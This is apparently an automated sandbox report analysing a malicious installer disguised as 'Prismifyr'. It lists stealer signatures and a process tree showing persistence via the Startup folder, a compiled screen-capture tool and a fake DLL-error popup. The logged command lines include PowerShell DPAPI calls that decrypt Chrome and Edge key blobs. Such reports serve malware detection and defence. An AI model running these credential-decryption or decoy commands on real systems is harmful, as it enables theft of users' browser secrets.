Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Prismifyr_Installer_v2.1 Setup 1.0.0.exe

Overview

General Information

Sample name:Prismifyr_Installer_v2.1 Setup 1.0.0.exe
Analysis ID:1541090
MD5:fe0ddf8159f4a56d194f90e1fb31f3b2
SHA1:adb5fcf6436b55cfd5391adc8e4d5725b2b1089b
SHA256:753581951adf2c71ae3ddcd51b5badda3e91f16aa32d09596d24fa5397451fc2
Infos:

Detection

Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected generic credential text file
Drops PE files to the startup folder
Drops large PE files
Sigma detected: MSHTA Suspicious Execution 01
Tries to harvest and steal browser information (history, passwords, etc)
Allocates memory with a write watch (potentially for evading sandboxes)
Compiles C# or VB.Net code
Contains functionality for read data from the clipboard
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Installs a raw input device (often for capturing keystrokes)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries keyboard layouts
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for the Microsoft Outlook file path
Searches for user specific document files
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Startup Folder File Write
Sigma detected: Use NTFS Short Name in Command Line
Sigma detected: Use Short Name Path in Command Line
Uses 32bit PE files
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • Prismifyr_Installer_v2.1.exe (PID: 64 cmdline: "C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe" MD5: F90856B824B429A51D390C25F21C9683)
    • cmd.exe (PID: 2884 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist /fo csv" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 4836 cmdline: tasklist /fo csv MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • Prismifyr_Installer_v2.1.exe (PID: 5708 cmdline: "C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\Prismifyr_Installer_v2.1" --gpu-preferences=UAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2244,i,14912361022600860785,9095772362069922900,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=2236 /prefetch:2 MD5: F90856B824B429A51D390C25F21C9683)
    • cmd.exe (PID: 2220 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 6472 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • Prismifyr_Installer_v2.1.exe (PID: 6404 cmdline: "C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\Prismifyr_Installer_v2.1" --field-trial-handle=2516,i,14912361022600860785,9095772362069922900,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=2512 /prefetch:3 MD5: F90856B824B429A51D390C25F21C9683)
    • cmd.exe (PID: 2864 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,82,140,181,59,205,133,36,68,131,195,71,114,10,9,65,24,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,36,243,112,255,236,176,19,21,161,232,5,156,15,224,214,169,185,79,161,35,240,200,160,226,160,19,168,214,186,239,155,235,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,225,241,231,195,97,47,248,22,206,161,226,92,44,44,51,207,166,8,46,136,147,185,84,185,27,183,252,114,164,252,148,168,48,0,0,0,2,140,235,235,139,99,133,55,160,143,64,53,168,135,193,81,10,81,94,101,239,145,72,8,97,176,119,236,164,201,155,27,236,184,11,80,145,31,10,79,199,92,71,166,116,84,131,150,64,0,0,0,33,136,240,246,163,86,84,202,92,12,170,239,80,17,93,81,235,159,209,41,5,212,210,23,106,50,31,57,94,244,205,86,198,111,237,171,160,240,77,231,4,197,113,175,235,153,59,29,176,183,188,244,160,186,186,93,146,97,116,126,129,24,71,225), $null, 'CurrentUser')" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 4184 cmdline: powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,82,140,181,59,205,133,36,68,131,195,71,114,10,9,65,24,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,36,243,112,255,236,176,19,21,161,232,5,156,15,224,214,169,185,79,161,35,240,200,160,226,160,19,168,214,186,239,155,235,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,225,241,231,195,97,47,248,22,206,161,226,92,44,44,51,207,166,8,46,136,147,185,84,185,27,183,252,114,164,252,148,168,48,0,0,0,2,140,235,235,139,99,133,55,160,143,64,53,168,135,193,81,10,81,94,101,239,145,72,8,97,176,119,236,164,201,155,27,236,184,11,80,145,31,10,79,199,92,71,166,116,84,131,150,64,0,0,0,33,136,240,246,163,86,84,202,92,12,170,239,80,17,93,81,235,159,209,41,5,212,210,23,106,50,31,57,94,244,205,86,198,111,237,171,160,240,77,231,4,197,113,175,235,153,59,29,176,183,188,244,160,186,186,93,146,97,116,126,129,24,71,225), $null, 'CurrentUser') MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 7028 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,82,140,181,59,205,133,36,68,131,195,71,114,10,9,65,24,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,73,231,212,88,131,180,108,13,7,151,85,6,156,66,67,185,57,141,176,137,39,153,232,122,3,148,29,97,139,226,146,101,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,25,208,58,196,147,38,229,71,17,84,57,121,51,122,21,191,192,210,223,56,196,102,132,177,163,7,170,237,170,96,43,123,48,0,0,0,22,214,107,180,137,106,64,43,246,209,3,97,183,60,179,87,35,178,252,209,63,28,6,231,92,233,101,110,37,191,114,95,102,37,85,25,129,162,60,71,136,36,115,191,138,222,1,225,64,0,0,0,221,128,244,169,226,245,40,30,145,232,4,127,240,108,165,92,23,225,199,246,49,201,112,97,127,7,108,202,49,141,230,234,32,54,72,203,159,33,237,81,195,247,232,115,207,194,239,99,114,230,169,121,178,134,199,77,110,131,115,20,107,231,17,6), $null, 'CurrentUser')" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 4836 cmdline: powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,82,140,181,59,205,133,36,68,131,195,71,114,10,9,65,24,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,73,231,212,88,131,180,108,13,7,151,85,6,156,66,67,185,57,141,176,137,39,153,232,122,3,148,29,97,139,226,146,101,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,25,208,58,196,147,38,229,71,17,84,57,121,51,122,21,191,192,210,223,56,196,102,132,177,163,7,170,237,170,96,43,123,48,0,0,0,22,214,107,180,137,106,64,43,246,209,3,97,183,60,179,87,35,178,252,209,63,28,6,231,92,233,101,110,37,191,114,95,102,37,85,25,129,162,60,71,136,36,115,191,138,222,1,225,64,0,0,0,221,128,244,169,226,245,40,30,145,232,4,127,240,108,165,92,23,225,199,246,49,201,112,97,127,7,108,202,49,141,230,234,32,54,72,203,159,33,237,81,195,247,232,115,207,194,239,99,114,230,169,121,178,134,199,77,110,131,115,20,107,231,17,6), $null, 'CurrentUser') MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 4924 cmdline: C:\Windows\system32\cmd.exe /d /s /c ""C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.bat" "C:\Users\user\AppData\Local\Temp\2024924-64-yswszl.55ad9.png" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • csc.exe (PID: 2988 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /nologo /r:"Microsoft.VisualBasic.dll" /win32manifest:"app.manifest" /out:"screenCapture_1.3.2.exe" "C:\Users\user\AppData\Local\Temp\SCREEN~1\SCREEN~1.BAT" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
        • cvtres.exe (PID: 3940 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9E2A.tmp" "c:\Users\user\AppData\Local\Temp\screenCapture\CSCEE08CA83D7542AAB04A7698A66ECD4F.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
      • screenCapture_1.3.2.exe (PID: 2736 cmdline: screenCapture_1.3.2.exe "C:\Users\user\AppData\Local\Temp\2024924-64-yswszl.55ad9.png" MD5: 18CDE4CFC9C121CC421152F9F86AED6B)
    • cmd.exe (PID: 5360 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 6076 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • cmd.exe (PID: 7008 cmdline: C:\Windows\system32\cmd.exe /d /s /c "start /B cmd /c mshta "javascript:new ActiveXObject('WScript.Shell').Popup('The program can not start because MSVCP140.dll is missing from your computer. Try reinstalling the program to fix this problem.', 0, 'Error', 16);close()"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 1512 cmdline: cmd /c mshta "javascript:new ActiveXObject('WScript.Shell').Popup('The program can not start because MSVCP140.dll is missing from your computer. Try reinstalling the program to fix this problem.', 0, 'Error', 16);close()" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • mshta.exe (PID: 4888 cmdline: mshta "javascript:new ActiveXObject('WScript.Shell').Popup('The program can not start because MSVCP140.dll is missing from your computer. Try reinstalling the program to fix this problem.', 0, 'Error', 16);close()" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
  • Prismifyr_Installer_v2.1.exe (PID: 5832 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr_Installer_v2.1.exe" MD5: F90856B824B429A51D390C25F21C9683)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Diego Perez (@darkquassar), Markus Neis, Swisscom (Improve Rule): Data: Command: mshta "javascript:new ActiveXObject('WScript.Shell').Popup('The program can not start because MSVCP140.dll is missing from your computer. Try reinstalling the program to fix this problem.', 0, 'Error', 16);close()", CommandLine: mshta "javascript:new ActiveXObject('WScript.Shell').Popup('The program can not start because MSVCP140.dll is missing from your computer. Try reinstalling the program to fix this problem.', 0, 'Error', 16);close()", CommandLine|base64offset|contains: m, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: cmd /c mshta "javascript:new ActiveXObject('WScript.Shell').Popup('The program can not start because MSVCP140.dll is missing from your computer. Try reinstalling the program to fix this problem.', 0, 'Error', 16);close()", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1512, ParentProcessName: cmd.exe, ProcessCommandLine: mshta "javascript:new ActiveXObject('WScript.Shell').Popup('The program can not start because MSVCP140.dll is missing from your computer. Try reinstalling the program to fix this problem.', 0, 'Error', 16);close()", ProcessId: 4888, ProcessName: mshta.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /nologo /r:"Microsoft.VisualBasic.dll" /win32manifest:"app.manifest" /out:"screenCapture_1.3.2.exe" "C:\Users\user\AppData\Local\Temp\SCREEN~1\SCREEN~1.BAT" , CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /nologo /r:"Microsoft.VisualBasic.dll" /win32manifest:"app.manifest" /out:"screenCapture_1.3.2.exe" "C:\Users\user\AppData\Local\Temp\SCREEN~1\SCREEN~1.BAT" , CommandLine|base64offset|contains: z%, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /d /s /c ""C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.bat" "C:\Users\user\AppData\Local\Temp\2024924-64-yswszl.55ad9.png" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4924, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /nologo /r:"Microsoft.VisualBasic.dll" /win32manifest:"app.manifest" /out:"screenCapture_1.3.2.exe" "C:\Users\user\AppData\Local\Temp\SCREEN~1\SCREEN~1.BAT" , ProcessId: 2988, ProcessName: csc.exe
Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe, ProcessId: 64, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr_Installer_v2.1.exe
Source: Process startedAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /nologo /r:"Microsoft.VisualBasic.dll" /win32manifest:"app.manifest" /out:"screenCapture_1.3.2.exe" "C:\Users\user\AppData\Local\Temp\SCREEN~1\SCREEN~1.BAT" , CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /nologo /r:"Microsoft.VisualBasic.dll" /win32manifest:"app.manifest" /out:"screenCapture_1.3.2.exe" "C:\Users\user\AppData\Local\Temp\SCREEN~1\SCREEN~1.BAT" , CommandLine|base64offset|contains: z%, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /d /s /c ""C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.bat" "C:\Users\user\AppData\Local\Temp\2024924-64-yswszl.55ad9.png" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4924, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /nologo /r:"Microsoft.VisualBasic.dll" /win32manifest:"app.manifest" /out:"screenCapture_1.3.2.exe" "C:\Users\user\AppData\Local\Temp\SCREEN~1\SCREEN~1.BAT" , ProcessId: 2988, ProcessName: csc.exe
Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /nologo /r:"Microsoft.VisualBasic.dll" /win32manifest:"app.manifest" /out:"screenCapture_1.3.2.exe" "C:\Users\user\AppData\Local\Temp\SCREEN~1\SCREEN~1.BAT" , CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /nologo /r:"Microsoft.VisualBasic.dll" /win32manifest:"app.manifest" /out:"screenCapture_1.3.2.exe" "C:\Users\user\AppData\Local\Temp\SCREEN~1\SCREEN~1.BAT" , CommandLine|base64offset|contains: z%, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /d /s /c ""C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.bat" "C:\Users\user\AppData\Local\Temp\2024924-64-yswszl.55ad9.png" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4924, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /nologo /r:"Microsoft.VisualBasic.dll" /win32manifest:"app.manifest" /out:"screenCapture_1.3.2.exe" "C:\Users\user\AppData\Local\Temp\SCREEN~1\SCREEN~1.BAT" , ProcessId: 2988, ProcessName: csc.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,82,140,181,59,205,133,36,68,131,195,71,114,10,9,65,24,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,36,243,112,255,236,176,19,21,161,232,5,156,15,224,214,169,185,79,161,35,240,200,160,226,160,19,168,214,186,239,155,235,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,225,241,231,195,97,47,248,22,206,161,226,92,44,44,51,207,166,8,46,136,147,185,84,185,27,183,252,114,164,252,148,168,48,0,0,0,2,140,235,235,139,99,133,55,160,143,64,53,168,135,193,81,10,81,94,101,239,145,72,8,97,176,119,236,164,201,155,27,236,184,11,80,145,31,10,79,199,92,71,166,116,84,131,150,64,0,0,0,33,136,240,246,163,86,84,202,92,12,170,239,80,17,93,81,235,159,209,41,5,212,210,23,106,50,31,57,94,244,205,86,198,111,237,171,160,240,77,231,4,197,113,175,235,153,59,29,176,183,188,244,160,186,186,93,146,97,116,126,129,24,71,225), $null, 'CurrentUser'), CommandLine: powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,82,140,181,59,205,133,36,68,131,195,71,114,10,9,65,24,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,36,243,112,255,236,176,19,21,161,232,5,156,15,224,214,169,185,79,161,35,240,200,160,226,160,19,168,214,186,239,155,235,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,225,241,231,195,97,47,248,22,206,161,226,92,44,44,51,207,166,8,46,136,147,185,84,185,27,183,252,114,164,252,148,168,48,0,0,0,2,140,235,235,139,99,133,55,160,143,64,53,168,135,193,81,10,81,94,101,239,145,72,8,97,176,119,236,164,201,155,27,236,184,11,80,145,31,10,79,199,92,71,166,116,84,131,150,64,0,0,0,33,136,240,246,163,86,84,202,92,12,170,239,80,17,93,81,235,159,209,41,5,212,210,23,106,50,31,57,94,244,205,86,198,111,237,171,160,240,77,231,4,197,113,175,235,153,59,29,176,183,188,244,160,186,186,93,146,97,116,126,129,24,71,225), $null, 'CurrentUser'), CommandLine|base64offset|contains: ~O*^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,82,140,181,59,205,133,36,68,131,195,71,114,10,9,65,24,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,36,243,112,255,236,176,19,21,161,232,5,156,15,224,214,169,185,79,161,35,240,200,160,226,160,19,168,214,186,239,
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7b4c3a21-e2df-5efd-beb5-591edeb53a62Jump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeFile created: C:\Users\user\AppData\Local\Temp\nsyC753.tmp\7z-out\LICENSE.electron.txtJump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeFile created: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\LICENSE.electron.txtJump to behavior
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: "ProgramDataBaseFileName": "$(IntDir)vc90b.pdb", source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: "$(IntDir)$(ProjectName)\\vc80.pdb", source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Dev\elevate\bin\x86\Release\Elevate.pdb source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2475862062.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2476010965.0000000002E0F000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2476074048.0000000002E12000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: # the .pdb by the precompiled header step for .cc and the compilation of source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: - Use '<(PRODUCT_DIR)/<(product_name).(exe|dll).pdb' if 'product_name' is source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: CLEANFILES="$CLEANFILES *.lib *.dll *.pdb *.exp" source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270572239.0000000005E20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: - Use '<(PRODUCT_DIR)/<(target_name).(exe|dll).pdb'. source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: *.$ac_ext | *.xcoff | *.tds | *.d | *.pdb | *.xSYM | *.bb | *.bbg | *.map | *.inf | *.dSYM ) ;; source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270572239.0000000005E20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\projects\src\out\Default\ffmpeg.dll.pdb source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2397315857.0000000005223000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: config_name, self.ExpandSpecial, output + ".pdb" source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: # See comment at cc_command for why there's two .pdb files. source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\projects\src\out\Default\libGLESv2.dll.pdb source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2278954943.0000000006B20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: pdb = self.GetPDBName(config, expand_special, output_name + ".pdb") source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: pdbpath_c = pdbpath + ".c.pdb" source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: "ProgramDataBaseFileName": "$(IntDir)\\vc90b.pdb", source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ** rbu_file.pDb!=0, then it is assumed to already be present on the source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270572239.0000000005E20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D3DCompiler_47.pdb source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2395663067.0000000005221000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: pdbpath_cc = pdbpath + ".cc.pdb" source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: "ProgramDatabaseFile": "Flob.pdb", source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp
